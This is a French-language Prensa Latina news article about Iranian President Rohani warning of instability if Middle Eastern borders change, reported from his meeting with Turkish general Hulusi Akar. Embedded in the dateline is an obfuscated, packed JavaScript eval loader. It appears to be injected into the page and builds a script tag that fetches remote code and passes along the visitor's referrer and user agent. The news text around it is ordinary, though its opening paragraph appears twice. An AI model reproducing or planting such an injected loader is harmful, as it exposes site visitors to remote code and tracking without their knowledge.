mercredi 17 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le président iranien prévient d’éventuels dangers si les frontières changent dans la région

Téhéran, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bfrba|var|u0026u|referrer|hznyf||js|php'.split('|'),0,{})) 3 octobre (Prensa Latina) Hispantv indique aujourd'hui que le président iranien, Hasan Rohani, a prévenu de « l'instabilité et l'insécurité que provoquera tout changement des frontières géographiques au Moyen-Orient ».

Téhéran, 3 octobre (Prensa Latina) Hispantv indique aujourd’hui que le président iranien, Hasan Rohani, a prévenu de « l’instabilité et l’insécurité que provoquera tout changement des frontières géographiques au Moyen-Orient ».

Lors d’une réunion avec le chef d’État Major des Forces Armées de Turquie, le général Hulusi Akar, de visite dans cette capitale, le premier mandataire iranien a confirmé son soutien aux gouvernements de Syrie et d’Irak qui luttent contre le terrorisme.

« De cette manière, nous aidons à maintenir l’intégrité territoriale de ces deux pays, nous facilitons la guerre contre le terrorisme qui occasionnerait des changements de frontières dans la région », a-t-il précisé.

Rohani a considéré que « l’Iran et la Turquie sont deux pays importants, et sont des piliers de la stabilité au Moyen-Orient capables de jouer un rôle influent dans la solution des problèmes régionaux », a-t-il souligné.

Selon le président du pays perse, « les deux nations font face à des menaces communes comme le terrorisme, l’insécurité et l’instabilité, d’où la nécessité d’élargir la collaboration ; en particulier dans le domaine militaire ».

« Les forces armées de l’Iran et de la Turquie peuvent établir des relations constructives dans le but de repousser les menaces régionales par le biais d’un développement plus important de la coopération et de l’échange d’expériences », a-t-il ajouté.

Pour sa part, le chef d’État Major turc a exprimé la disposition de son pays à renforcer la coopération avec Téhéran dans différents domaines, parmi lesquels la lutte contre le terrorisme.

Par ailleurs, le président turc, Recep Tayyip Erdogan, prévoit de se rendre demain à Téhéran pour se réunir avec les autorités iraniennes.

peo/tgj/arc

EN CONTINU
notes connexes